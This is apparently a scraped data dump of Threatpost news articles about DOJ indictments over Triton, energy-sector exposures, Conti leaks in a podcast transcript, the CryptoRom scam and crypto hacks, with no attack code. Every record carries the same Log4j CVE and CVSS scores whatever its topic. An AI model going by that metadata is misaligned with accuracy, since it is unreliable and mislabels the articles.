computer fraud and abuse and conspiracy to commit wire fraud. Akulov and Gavrilov are also charged with substantive counts of wire fraud and computer fraud related to unlawfully obtaining information from computers and causing damage to computers. Akulov and Gavrilov are also charged with three counts of aggravated identity theft.\n\n## Still Gaping Security Holes in Energy Companies\n\nLookingGlass CEO Gilman Louie, an expert on national security and cybersecurity who regularly shares or analyzes intel with government agencies, told Threatpost on Friday that legal actions against the potential operators of the critically dangerous Triton malware are welcome: They\u2019re a \u201cpositive move [that] sends a strong message to cybercrime and nation-state actors globally,\u201d he said via email.\n\nOn the less-positive side, a recent LookingGlass cyber profile of the U.S. Energy sector looks grim.\n\nMany energy companies are sitting ducks, with current cybersecurity exposures that have already been exploited by Russian actors in the past, including open ports that enable threat actors to gain full remote access.\n\nThe report shares vulnerabilities and exposures that Russian hackers are known to have used. \u201cFor years, energy companies have been hammered on securing their operational technology. The Triton attacks show why this is important,\u201d Louie noted.\n\nBut he stated that \u201corganizations also need to ensure they\u2019re improving security on their traditional IT side.\u201d He pointed to the Colonial Pipeline attack as an example of how adversaries \u201cdidn\u2019t need in-depth knowledge of [operational technology, or OT] to shut down the flow of gas or oil.\u201d \n\nLookingGlass research shows that, across the energy sector, there are vulnerabilities that are more than 5 years old that haven\u2019t been dealt with, and open ports like remote desktop that are \u201cbasically unprotected doors into an organization.\u201d\n\nEnergy companies need to be patching or updating their systems, Louie said and shutting those open doors: \u201cIf they really need a port open for remote desktop, then they need to add layers of compensating security controls to make sure it\u2019s not easy to exploit.\u201d\n\nWhen unsealing the indictments, the government noted that it\u2019s taking action to [enhance private sector network defense efforts](<https://www.cisa.gov/uscert/ncas/alerts/aa22-083a>) and to [disrupt similar malicious activity](<https://protect2.fireeye.com/v1/url?k=73f0be82-2c6b867e-73f79a67-ac1f6b01771c-a72e8f7b8ceb667b&q=1&e=d2252912-db07-4b30-8381-4dbd442acfc0&u=https%3A%2F%2Frewardsforjustice.net%2Findex%2F%3Fjsf%3Djet-engine%3Arewards-grid%26tax%3Dcyber%3A857>).\n\nOther security issues that Russian actors have leveraged, which companies need to address immediately before they are used for attacks that could be bigger than those we\u2019ve already seen, include:\n\n * **Default Passwords**: Exactly what it sounds like. Default passwords are a major attack vector. Not changing default passwords, especially with a tool like Telnet, leaves companies wide open to Russian access to networks.\n * [**Port 161 \u2013 SNMP protocol**](<https://www.cisa.gov/uscert/ncas/alerts/TA18-106A>): The Simple Network Management Protocol (SNMP) uses both port 161 and port 162 for sending commands and messages and is being used by Russia to gain access to network devices and infrastructure. Older versions of this protocol are unsecure and allow threat actors to eavesdrop or manipulate data.\n * **Port 139/445 \u2013 SMB: **The SMB network port is commonly used for file sharing. Russian groups have successfully targeted this port to execute remote code and to steal information, LookingGlass found.\n\nThese are just a few examples of security exposures that threat actors tied directly to Russia have exploited and will likely exploit again within U.S. companies, according to LookingGlass\u2019s research.\n\nIt\u2019s not time to wait for a nuclear-level cyber event, given that threat actors are already inside the power infrastructure. Now\u2019s the time for companies to find and mitigate the holes that let them in, Louie said.\n\n\u201cEnergy sector entities should be reviewing their digital footprint and taking action to secure their external-facing assets, especially as the threat of Russian cyberattacks intensifies,\u201d he said.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-25T21:25:17", "type": "threatpost", "title": "DOJ Indicts Russian Gov\u2019t Employees Over Targeting Power Sector", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-25T21:25:17", "id": "THREATPOST:138507F793D8399AF0EE1640C46A9698", "href": "https://threatpost.com/doj-indicts-russian-govt-employees-over-targeting-power-sector/179108/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-04T03:51:25", "description": "Information about nuclear plants and air force capabilities. Conti ransomware gang crooks [conjecturing](<https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-i-evasion/>) that the National Security Agency (NSA) was maybe behind the mysterious, months-long [TrickBot](<https://threatpost.com/trickbot-amazon-paypal-top-brands/178483/>) [lull](<https://threatpost.com/trickbot-break-researchers-scratching-heads/178678/>). [Doxxed data](<https://www.theregister.com/2022/03/02/russian_soldier_leaks/>) about 120K Russian soldiers.\n\nThose are just some of the sensitive, valuable data that\u2019s being hacked out of Russia in the [cyber war zone](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>) \u2013 a war that erupted [even before](<https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/>) the country invaded Ukraine.\n\n\u201cEveryone is so focused on Russia hacking the world, but the world has been hacking Russia\u2026. And dumping a lot of critical data on military, nuclear plants, etc.,\u201d said Vinny Troia, cybersecurity Ph.D. and founder of [ShadowByte](<https://shadowbyte.com/>), a dark web threat intelligence and cyber fraud investigations firm.\n\nHe\u2019s one of an untold number of experts on dark-web threat intelligence who\u2019ve been pouring over the intel that\u2019s been flooding out of practically every nook and cranny of the internet: data that\u2019s being posted on Twitter, Telegram and within the multiple dumps of insider knowledge about the Conti ransomware gang posted by the Ukrainian supporter ContiLeaks.\n\n\n\n(Brought to you by SpecOps. Underwriters of Threatpost podcasts do not assert any editorial control over content.)\n\nThat ongoing dump, which has included [source code](<https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/>) for Conti and TrickBot, a decryptor (that doesn\u2019t help recent victims whose files have been encrypted by the Conti gang, unfortunately), and much more, stopped yesterday when the Conti gang shut down its Jabber servers, Troia told Threatpost on Wednesday.\n\nHe visited the Threatpost podcast to update us on the mountain of data about Russia that intelligence experts are now slogging through.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/030222_Vinny_Troia_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>). Also, see below for a lightly edited transcript. \n\n\n## Lightly Edited Transcript\n\n**Lisa Vaas:** Listeners, welcome to the Threatpost podcast. My guest today is Vinny Troia, cybersecurity PhD and founder of ShadowByte, a dark web threat intelligence and cyber fraud investigations firm. Today, we\u2019re going to focus on all of the data that\u2019s being leaked on Russia as a result of its invasion of Ukraine.\n\n**Lisa Vaas:** Thanks for coming on the podcast. Vinny, before we jump in, could you give us a bit of your background, please?\n\n**Vinny Troia:** Sure. Thanks for having me. Yes. So my background I come from a DOD background did a lot of work for surface deployment command. And yeah, I was there for about, I think six or seven years before moving over to private sector.\n\n**Vinny Troia:** And while I was there, I did a lot of work in compliance and random security hacking projects, a lot of red teaming, pen testing. And then eventually I started my own firm. Fast forward to today, our focus now is primarily dealing with a lot of ransomware cases, incident response, and we do a lot of ransom negotiations as well.\n\n**Vinny Troia:** We\u2019re constantly focused on dark web threat actors and any of the players, really.\n\n**Lisa Vaas:** Thank you for that. And well this past week must be just a flurry with the dark web activity around Ukraine and Russia. So in an email, you were talking about how everyone is so focused on Russia hacking the world, but the world has been also hacking Russia and dumping a lot of critical data on military nuclear plants, etc.\n\n**Lisa Vaas:** Where is your Intel coming from? Are there any forums in particular that you\u2019re clued into or is that something you can\u2019t even discuss?\n\n**Vinny Troia:** it\u2019s not even like that. It\u2019s a, I mean, it\u2019s literally everywhere. I mean, there\u2019s Telegram channels. I mean, some is just being pasted right on Twitter.\n\n**Vinny Troia:** I mean, it\u2019s literally coming from all angles at this point.\n\n**Lisa Vaas:** Well, tell me what you\u2019re seeing.\n\n**Vinny Troia:** I\u2019d say last month, there was a lot of data coming out about Ukrainian citizens. I mean, a lot. So that was kind of interesting, almost like a precursor to what was happening.\n\n**Vinny Troia:** And now it\u2019s almost like, the rest of the world that\u2019s really pissed and started hacking back and you\u2019re seeing so much data coming out. I\u2019m actually looking for sorry, as we speak, I\u2019m going through some of this data. I mean, there\u2019s stuff on a nuclear plants, some of their air force capabilities.\n\n**Vinny Troia:** There\u2019s another database that I just recently came across that is about a hundred thousand of their military members with photos, passport numbers, things like that. I mean, it\u2019s really just data coming from all depths of. From other infrastructure,\n\n**Lisa Vaas:** well, who, who, who is the primary sources?\n\n**Lisa Vaas:** I mean, I know that anonymous of course has jumped in to, to, to wage war on behalf of Ukraine, cyber war on behalf of Ukraine. And I know that you can put out a call for help from cyber experts on this too. So who, who exactly is, is. Hacking this stuff out of Russia.\n\n**Vinny Troia:** I mean, I, honestly, I couldn\u2019t tell you, I mean, it\u2019s coming, like I said, it\u2019s coming from all sorts of places.\n\n**Vinny Troia:** Right. And when things get leaked, I mean, they just get leaked from various [sources\u2019] usernames on forums or Telegram channels. And so you never really know who it\u2019s coming from. It is interesting that the world kind of banded together against this. And Russia was supposed to have this big cyber arsenal against them.\n\n**Vinny Troia:** And it\u2019s really funny that Joe Biden didn\u2019t mention security once in the state of the union last night, being that it was such a big deal and everybody\u2019s been talking about it.\n\n**Lisa Vaas:** Yeah. And, and I remember it was an NBC news last week or, or was reporting on the big cyberattacks, the major offensive cyberattacks that were being discussed at the White House, but then the White House denied [considering offensive cyberattacks].\n\n**Vinny Troia:** The news has been all about cyberattacks and Russia\u2019s capabilities and it\u2019s such a priority, but it just wasn\u2019t even mentioned once. I just, I find that really strange, but regardless, it\u2019s nice that the world kind of banded together to really come after Russia. One of the most, honestly, just incredibly fascinating things is all these leaks that have been occurring regarding the Conti ransomware. Yes. And they\u2019re arguably the largest or at least one of the top few largest ransomware groups in the world. And I mean, they\u2019re just having everything leak: source code, recovery, keys, chat logs.\n\n**Vinny Troia:** I mean, as early, as recently as today with the most recent chat logs that came out, so somebody still has access to their servers and I haven\u2019t even had a chance to read the ones from today.\n\n**Lisa Vaas:** I just wrote up the second dump and I didn\u2019t even know there was more posted today. It\u2019s so hard to keep up. Can we talk a little bit about those dumps? Now as I understand it, it\u2019s the decryptor for version two of the Conti Lock ransomware software [that was leaked]. That\u2019s not even going to be usable to anybody because it was for an older version.\n\n**Lisa Vaas:** How is this going to affect Conti? Another one of my sources was telling me that just one of the gang\u2019s groups got hit by this [leak] and everybody else is pretty much doing fine. They\u2019re carrying on business as usual.\n\n**Vinny Troia:** I think what\u2019s really interesting. And they talked about this in one of the, in some of the logs. So Conti uses, or used, this one piece of software called TrickBot in order to disseminate and \u2026 one of the or groupings of the chat log showed that the NSA came after TrickBot specifically.\n\n**Vinny Troia:** I don\u2019t know whether or not they reverse engineered or what they did, but I mean, they were able to shut it down for a couple of weeks just by changing patch numbers and uploading them to a server that would accept the changes. And so what they did was they maxed out the maximum patch number.\n\n**Vinny Troia:** The software couldn\u2019t take any new updates at that point. So they effectively shut it down for a little bit. That was actually really amazing.\n\n**Lisa Vaas:** I totally missed that. Which repository was that in? What\u2019s the name of the repository?\n\n**Vinny Troia:** It\u2019s all JSON files.\n\n**Lisa Vaas:** Everybody knew that TrickBot pretty much shut down for a few months, but I didn\u2019t know that about the NSA piece.\n\n**Vinny Troia:** It\u2019s presumed to be the NSA, given the level of skill that was involved, we\u2019ll call it finesse. I would say it would have to be some government agency.\n\n**Lisa Vaas:** Was there chatter about the shutdown?\n\n**Vinny Troia:** Yeah, it\u2019s basically a handful of officials talking about it and how they were shut down and how they basically had to rebuild their infrastructure.\n\n**Vinny Troia:** They were down for a little bit and eventually they came back, but it just shows that they were being targeted by nation states. I think the most interesting thing is, if this really is a Russian operated group, which is what it seems like, then the fact that all these files are being leaked, whether it\u2019s from an insider or somebody who\u2019s a researcher who\u2019s attacking them specifically, I think this is going to have a major toll on Russia\u2019s finances, especially considering this is a group that is averaging what, a couple hundred million dollars a year recurring revenue?\n\n**Lisa Vaas:****** I don\u2019t expect you to know this, but maybe you do: How much of Russia\u2019s economy is actually coming from ransomware or other malware?\n\n**Vinny Troia:** I think the majority, actually. So I think the majority of Russia\u2019s economy is coming from some sort of crime. There\u2019s not a whole lot going on over there. It\u2019s like a big wasteland,\n\n**Lisa Vaas:** Right. The underground members say \u201cprotect the motherland, the motherland protects you. \u201cExcept for when they need some stooges to arrest, some low-level stooges to make the U.S. happy, which happened recently.\n\n**Vinny Troia: **As far as the decryptor [goes], you\u2019re correct. It is for an older version. I think I saw some keys floating around as well, but new code is written on top of old code and it\u2019s not like it was replaced completely. So I would imagine that there will be some fallout from that code base.\n\n**Lisa Vaas:** Yeah, there\u2019s a lot of code to go through. I hear. So what were some other really great finds in the intelligence that we\u2019re getting out of Russia during this crisis?\n\n**Vinny Troia:** It\u2019s information on citizens, it\u2019s information on military members. I\u2019ve seen things on nuclear plants. I can\u2019t speak to what can be done with all of it, honestly, but the point is it\u2019s there and, in the right hands, I\u2019m sure it could be pretty useful.\n\n**Lisa Vaas:** I assume, during these days, it\u2019s just not going to let up.\n\n**Vinny Troia:** No, and like I said, a couple of hours ago we had more leaks from their Jabber server. So I would imagine whoever has access has been able to pull off a lot, and I think [Conti] actually just shut it down finally.\n\n**Lisa Vaas:** So that means they they shut down Jabber. That doesn\u2019t mean that they figured out who the leaker is. Right?\n\n**Vinny Troia:** The person leaking it goes by [ContiLeaks]. But whether or not he\u2019s the one with access, I don\u2019t know. But the point is they figured out that somebody did have access to their Jabber logs. So now they\u2019ve moved servers.\n\n**Lisa Vaas:** Well, awesome. What else can you tell listeners? What can you leave us with?\n\n**Vinny Troia:** I would say that, just because Conti\u2019s out doesn\u2019t mean that the problem is going away anytime soon. So be diligent and keep up with your passwords and make sure that you actually have fresh passwords, because looking at these logs and how they\u2019re getting into a lot of these systems, it\u2019s just using other people\u2019s recycled passwords.\n\n**Vinny Troia:** The hacks they\u2019re using aren\u2019t even that sophisticated. And I mean, even now the majority of hacks are still caused by reused passwords.\n\n**Lisa Vaas:** We can get some intelligence out of the exploits that they\u2019re targeting. I think I saw Zerologin was mentioned as one, and of course we know a lot about their tooling right now. Like the whole Cobalt Strike beacon thing.\n\n**Vinny Troia:** Cobalt Strike\u2019s been a red teaming tool forever. It\u2019s a staple. For pen testers, it\u2019s an amazing tool. And so the fact that they were using it isn\u2019t really a surprise.\n\n**Lisa Vaas:** Well, is there anything surprising that was found in the dumps? I know that we\u2019ve got email addresses of some of the members of the gang.\n\n**Vinny Troia:** You can use that to look for other accounts and potentially start to reverse back to maybe who they are. But I mean, there\u2019s so much information here. I haven\u2019t even gone through maybe a 10th of it. It\u2019s coming up too fast. It\u2019s a full-time job. It takes a full-time team at this point to go through all of this. Because then there was another thing that came out: rocket chat logs from a rocket chat. There\u2019s thousands of logs here.\n\n**Lisa Vaas:** Yeah, that\u2019s pretty bad. When you\u2019ve got a researcher, an intel expert who says he\u2019s getting too much: The firehouse is open so wide. So the takeaways for listeners are that these leaks haven\u2019t stopped, and we don\u2019t even know how many that [ContiLeaks] is promising.\n\n**Vinny Troia:** I mean, the fact that today\u2019s leaks caused the shutdown, I presume caused a shut down of their Jabber server. I\u2019m going to say that well has pretty much run dry. I don\u2019t know what else is going to be released in terms of tools, but I\u2019d say all of this has probably put a dent in everything they\u2019re doing for a little bit.\n\n**Lisa Vaas:** We can hope so, but I don\u2019t think we should assume anything. And that\u2019s what you\u2019re telling us: They\u2019re still going to be active and they\u2019re going to retool anyway. Right. And will resurface.\n\n**Vinny Troia:** Yeah. I was going to say, giving credit to [security journalist Brian] Krebs on this one, one of the things he reported on was that there was a conversation, and I haven\u2019t even made it to the set about how the ransomware groups were being investigated.\n\n**Vinny Troia:** And someone high up in the group basically told them they didn\u2019t have anything to worry about. The investigation was going to go off of them. And that was right around the time that Russia took down REvil. So it was interesting. It\u2019s almost like they had insider information, or maybe they literally were working for [Russia].\n\n**Lisa Vaas:** I think REvil. that takedown, was the one I was thinking about when I alluded to this kind of token law enforcement action on Russia\u2019s part to maybe make the U.S. shut up. Now I have to go read Brian Krebs. Why didn\u2019t I read Brian Krebs earlier today? I have to do that. That\u2019s like a requirement of the job. OK, well, Vinnie, unless you\u2019ve got anything else to add, I\u2019m going to let you go.\n\n**Vinny Troia:** No, all good.\n\n**Lisa Vaas:** I appreciate it. Thank you so much. Thanks for coming on the podcast.\n\n030322 10:49 UPDATE: ContiLeaks, the source of the Conti leaks, is not believed to be the same entity as vx_underground, which has disseminated the leaked files.\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-03T16:31:36", "type": "threatpost", "title": "Russia Leaks Data From a Thousand Cuts\u2013Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-03T16:31:36", "id": "THREATPOST:6C547AAC30142F12565AB289E211C079", "href": "https://threatpost.com/russia-leaks-data-thousand-cuts-podcast/178749/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-16T20:53:33", "description": "For about a year now, crypto-traders and lovelorn singles alike have been losing their money to CryptoRom, a malware campaign that combines catfishing with crypto-scamming.\n\nAccording to [research](<https://news.sophos.com/en-us/2022/03/16/cryptorom-bitcoin-swindlers-continue-to-target-vulnerable-iphone-and-android-users/>) from Sophos, CryptoRom\u2019s perpetrators have now improved their techniques. They\u2019re leveraging new iOS features \u2013 [TestFlight](<https://developer.apple.com/testflight/>) and [WebClips](<https://support.apple.com/guide/deployment/%22>) \u2013 to get fake apps onto victims\u2019 phones without being subject to the rigorous app store approval process.\n\nSuccessful CryptoRom scams have resulted in five-, six- and even seven-figure losses for victims.\n\n## What is CryptoRom?\n\nWe do silly things when we\u2019re in love. In fact, [scientifically speaking](<https://link.springer.com/article/10.1007/s10508-015-0589-y>), our inhibitions and decision-making capabilities become impaired in the face of romance and sexual arousal.\n\nPerhaps that\u2019s why hackers have been so successful in targeting dating apps over the years. Last year, the Federal Trade Commission [reported](<https://consumer.ftc.gov/articles/what-you-need-know-about-romance-scams#:~:text=Romance%20scams%20reached%20a%20record,%2C%20Facebook%2C%20or%20Google%20Hangouts.>) that \u201cromance scams\u201d cost U.S. citizens over 300 million dollars in 2020, up 50 percent from 2019.\n\nCapitalizing on this trend, last year a new and well-coordinated campaign began targeting users of dating apps like Bumble, Tinder and Grindr. According to a Sophos [report](<https://news.sophos.com/en-us/2021/10/13/cryptorom-fake-ios-cryptocurrency-apps/>) last fall, the attackers\u2019 M.O. is to begin there, then move the conversation to messaging apps.\n\n\u201cOnce the victim becomes familiar, they ask them to install fake trading applications with legitimate looking domains and customer support,\u201d researchers explained.\n\nThe trading apps tend to be cryptocurrency-related, since, more so than with fiat currency, cryptocurrency payments are [irreversible](<https://www.uschamber.com/co/run/finance/accepting-cryptocurrency-as-payment#:~:text=Cryptocurrency%20transactions%20are%20irreversible&text=%E2%80%9CTransactions%20can%20be%20refunded%20only,has%20paid%2C%E2%80%9D%20wrote%20Inc.>).\n\n\u201cThey move the conversation to investment and ask them to invest a small amount, and even let them withdraw that money with profit as bait,\u201d according to Sophos. \u201cAfter this, they will be told to buy various financial products or asked to invest in special \u2018profitable\u2019 trading events. The new friend even lends some money into the fake app, to make the victim believe they\u2019re real and caring. When the victim wants their money back or gets suspicious, they get locked out of the account.\u201d\n\nThe ruse can go on quite a while before victims catch on. One anonymous person told Sophos that they lost more than $20,000, while another complained of investing $100,000 into the fake app, while bringing a brother and friends into the scheme unwittingly.\n\nIn the worst case thus far, one user wrote that \u201cI have invested all my retirement money and loan money, about $1,004,000. I had no idea that they would freeze my account, requiring me to pay $625,000, which is 20 percent taxes on the total profits before they will unfreeze my account.\u201d\n\nKarl Steinkamp, director at Coalfire, told Threatpost that the scam is a perfect storm of social engineering.\n\n\u201cAn overarching theme here is twofold: One, we are seeing the world\u2019s population rapidly wanting to adopt some format of crypto assets, whether this is Bitcoin, Ethereum or any one of the other 17K+ altcoins,\u201d he said. \u201cAnd two, there is an increasing need for end user (and company) security awareness training when utilizing, storing and transferring any crypto asset. Crypto and digital-asset protection includes different technologies and skills needed to adequately secure the resources.\u201d\n\nHe added, \u201cThe mixing of dating, money / lending, and social-engineering efforts is and will continue to be a potent combination for bad actors to continue to steal money from victims. Bad actors only need to find one crack in the armor, while individuals and companies need to protect against every avenue of threats.\u201d\n\n## What\u2019s New This Time?\n\nA crucial component to the CryptoRom attack flow is those fake apps. Victims might receive a link to download what purports to be BTCBOX, for example, or Binance \u2013 perfectly legitimate cryptocurrency trading platforms. These apps appear to have professional user interfaces, and even come with customer-service chat options.\n\nApple and Google apply strict vetting to weed out malicious mobile apps like these from their official stores. But, as Threatpost has [covered before](<https://threatpost.com/teabot-trojan-haunts-google-play-store/178738/>), hackers have clever tricks to get around conventional security testing. In the past, for example, CryptoRom\u2019s preferred method was to use [the Apple Developer Program and Enterprise Signatures](<https://threatpost.com/cryptorom-scammers-apple-enterprise-features/175474/>).\n\nNow, CryptoRom is taking advantage of two new iOS features.\n\nThe first, TestFlight, is a feature developers can use to distribute beta versions of their apps to testers.\n\n\u201cUnfortunately,\u201d wrote the researchers, \u201cjust as we\u2019ve seen happen with other alternative app distribution schemes supported by Apple, \u2018TestFlight Signature\u2019 is available as a hosted service for alternative iOS app deployment, making it all too simple for malware authors to abuse.\u201d\n\nCryptoRom has shifted from Enterprise Signatures towards TestFlight Signatures because, wrote Sophos, \u201cit is a bit cheaper\u201d \u2013 requiring only an .IPA file with a compiled iOS app. Apps also look \u201cmore legitimate when distributed with the Apple Test Flight App,\u201d researchers added. \u201cThe review process is also believed to be less stringent than App Store review.\u201d\n\n\u201cHackers leveraging Apple\u2019s TestFlight platform as a distribution mechanism for malicious apps is a clever \u2014 and relatively simple \u2014 tactic that can certainly lead to problems for victims,\u201d Ray Kelly, fellow at NTT Application Security, told Threatpost. \u201cUsers should understand that side-loading applications is always a precarious proposition. Apps that are downloaded and installed outside of the of the App Store or Google Play ecosystem have not been vetted for security and privacy risks, leaving the door wide open for attackers to compromise users\u2019 personal data and sometimes, their financial accounts.\u201d\n\nEven more so than TestFlight, CryptoRom attackers have been using WebClips, a feature that allows web links to be added to the iOS home screen like regular apps. Malicious WebClips mimic real apps like RobinHood (in the following case, \u201cRobinHand\u201d).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/16132308/RobinHand.png>)\n\nA malicious WebClip offering in the Apple App Store. Source: Sophos.\n\n\u201cIn addition to App Store pages, all these fake pages also had linked websites with similar templates to convince users,\u201d the researchers wrote. \u201cThis shows how cheap and easy it is to mimic popular brands while siphoning thousands of dollars from victims.\u201d\n\nSince it\u2019s almost impossible for law enforcement to crack down on any one individual scam, app store providers hav a responsibility to monitor for misuse of these developer tools, Mark Lambert, vice president of products at ArmorCode, told Threatpost. He added, \u201cUltimately, however, the problem is a lack of security awareness. It is essential that users look for things that \u2018don\u2019t look right\u2019 and have a fundamental view of not trusting electronic communications or taking them on face value.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists. _**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-16T17:32:59", "type": "threatpost", "title": "\u2018CryptoRom\u2019 Crypto Scam is Back via Side-Loaded Apps", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-16T17:32:59", "id": "THREATPOST:76A072EE53232EB197F119EC2F7EAA74", "href": "https://threatpost.com/cryptorom-crypto-scam-side-loaded-apple-apps/178942/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-31T14:20:09", "description": "Why in the world would a collection of nonfungible token (NFT) gorilla avatars called the Bored Ape Yacht Club (BAYC), run by 30-somethings using aliases like \u201cEmperor Tomato Ketchup\u201d and \u201cNo Sass\u201d and [adored by celebrities](<https://www.vanityfair.com/news/2022/02/bored-ape-yacht-club-revealed>), spiral on up to a [multibillion-dollar valuation](<https://www.coingecko.com/en/nft/bored-ape-yacht-club>) (\u2026and, by the way, how can you yourself get stinking crypto-rich?!)?\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/30153635/Bored-Ape-Yacht-Club-NFT-scaled-e1648669046321.jpeg>)\n\nImage of Bored Ape Yacht Club NFT.\n\nIf you don\u2019t have a clue, you might be one of the crypto-newbies for whom the New York Times recently pulled together its [Latecomer\u2019s Guide to Crypto](<https://www.nytimes.com/interactive/2022/03/18/technology/cryptocurrency-crypto-guide.html>) and whom [mutual funds companies](<https://www.fidelity.com/viewpoints/active-investor/beyond-bitcoin>) are trying to [ease into](<https://economictimes.indiatimes.com/markets/cryptocurrency/crypto-investment-in-mutual-funds-style-mudrex-launches-coin-sets/articleshow/87099763.cms?from=mdr>) the brave new world.\n\nYou also might have a thousand questions that go beyond cartoon apes and get into the nitty-gritty of how cryptocurrency and blockchain technologies work and how to sidestep the associated cybersecurity risks.\n\nThose risks are big, throbbing realities. The latest: Ronin, an Ethereum-linked blockchain platform for NFT-based video game Axie Infinity, on Tuesday put up a [blog post](<https://roninblockchain.substack.com/p/community-alert-ronin-validators?s=w>) advising that 173,600 ether tokens and 25.5 million USD coins \u2013 valued at nearly $620 million as of Tuesday \u2013 had been drained from its platform after an attacker used hacked private keys to forge two fake withdrawals last week.\n\nAccording to [Forbes](<https://www.forbes.com/sites/jonathanponciano/2022/03/29/second-biggest-crypto-hack-ever-600-million-in-ethereum-stolen-from-nft-gaming-blockchain/?sh=280f0f0c2686>), blockchain analytics firm Elliptic pegs it as the second-biggest hack ever.\n\n## New Technology, Old Hacks\n\nCryptocurrency and related technologies may be shiny new concepts, but the techniques crooks are using to drain them aren\u2019t necessarily newfangled. As of its Wednesday update, Ronin said that it looks like the breach was pulled off with old-as-the-hills social engineering:\n\n> \u201cWhile the investigations are ongoing, at this point we are certain that this was an external breach. All evidence points to this attack being socially engineered, rather than a technical flaw.\u201d \u20143/30/22 Ronin alert.\n\nDr. Lydia Kostopoulos, senior vice president of emerging tech insights at [KnowBe4](<https://www.knowbe4.com/>), stopped by the Threatpost podcast to give us an overview of this brave new world of blockchain: a landscape of new technologies that are making wallets swell and shrink and hearts to flutter in dismay when such things as the Ronin hack transpire.\n\nShe shared her insights into everything from how such technologies work to what the associated cybersecurity risks are, including:\n\n * How blockchain technologies, including NFTs, work.\n * The cybersecurity risks 